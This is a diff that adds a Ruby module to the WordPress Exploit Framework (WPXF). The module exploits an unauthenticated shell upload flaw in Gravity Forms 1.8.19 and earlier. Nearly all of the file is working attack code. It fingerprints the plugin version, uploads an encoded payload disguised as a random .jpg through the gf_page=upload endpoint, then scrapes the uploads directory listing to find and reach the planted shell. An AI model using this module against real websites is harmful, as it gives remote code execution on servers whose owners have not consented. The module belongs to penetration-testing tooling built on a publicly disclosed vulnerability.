|
| 1 | +class Wpxf::Exploit::GravityFormsV1819ShellUpload < Wpxf::Module |
| 2 | + include Wpxf::WordPress::ShellUpload |
| 3 | + |
| 4 | + def initialize |
| 5 | + super |
| 6 | + |
| 7 | + update_info( |
| 8 | + name: 'Gravity Forms <= 1.8.19 Unauthenticated Shell Upload', |
| 9 | + author: [ |
| 10 | + 'Sucuri.net', # Discovery and disclosure |
| 11 | + 'Rob Carr <rob[at]rastating.com>' # WPXF module |
| 12 | + ], |
| 13 | + references: [ |
| 14 | + ['WPVDB', '7820'] |
| 15 | + ], |
| 16 | + date: 'Dec 08 2014' |
| 17 | + ) |
| 18 | + |
| 19 | + register_option( |
| 20 | + IntegerOption.new( |
| 21 | + name: 'form_id', |
| 22 | + desc: 'A valid Gravity Forms form ID', |
| 23 | + default: 1, |
| 24 | + required: true |
| 25 | + ) |
| 26 | + ) |
| 27 | + end |
| 28 | + |
| 29 | + def check |
| 30 | + changelog = normalize_uri(wordpress_url_plugins, 'gravityforms', 'change_log.txt') |
| 31 | + check_version_from_custom_file(changelog, /Version\s+(\d+\.\d+(\.\d+)*)/, '1.8.20') |
| 32 | + end |
| 33 | + |
| 34 | + def form_id |
| 35 | + normalized_option_value('form_id') |
| 36 | + end |
| 37 | + |
| 38 | + def uploader_url |
| 39 | + full_uri |
| 40 | + end |
| 41 | + |
| 42 | + def upload_request_params |
| 43 | + { |
| 44 | + 'gf_page' => 'upload', |
| 45 | + 'form_id' => form_id |
| 46 | + } |
| 47 | + end |
| 48 | + |
| 49 | + def payload_body_builder |
| 50 | + builder = Utility::BodyBuilder.new |
| 51 | + builder.add_field('name', payload_name) |
| 52 | + builder.add_field('field_id', 1) |
| 53 | + builder.add_file_from_string('file', payload.encoded, "#{Utility::Text.rand_alpha(5)}.jpg") |
| 54 | + builder |
| 55 | + end |
| 56 | + |
| 57 | + def scrape_upload_folder |
| 58 | + emit_info 'Scraping target for the upload location...' |
| 59 | + uploads_url = normalize_uri(wordpress_url_uploads, 'gravity_forms') |
| 60 | + res = execute_get_request(url: uploads_url) |
| 61 | + |
| 62 | + unless res && res.code == 200 |
| 63 | + emit_error 'The target appears to have directory listing disabled' |
| 64 | + emit_error "Code: #{res.code}", true |
| 65 | + return nil |
| 66 | + end |
| 67 | + |
| 68 | + name = res.body[/href="(#{form_id}\-[a-z0-9\/]+?)"/i, 1] |
| 69 | + emit_success "Found directory: #{name}" |
| 70 | + name |
| 71 | + end |
| 72 | + |
| 73 | + def validate_upload_result |
| 74 | + return false unless upload_result && upload_result.code == 200 |
| 75 | + res = JSON.parse(upload_result.body) |
| 76 | + |
| 77 | + if res['status'] == 'error' |
| 78 | + emit_error "Upload failed: #{res['error']['message']}" |
| 79 | + return false |
| 80 | + end |
| 81 | + |
| 82 | + true |
| 83 | + end |
| 84 | + |
| 85 | + def uploaded_payload_location |
| 86 | + directory = scrape_upload_folder |
| 87 | + return false unless directory |
| 88 | + normalize_uri(wordpress_url_uploads, 'gravity_forms', directory, 'tmp', "_input_#{form_id}_#{payload_name}") |
| 89 | + end |
| 90 | +end |
0 commit comments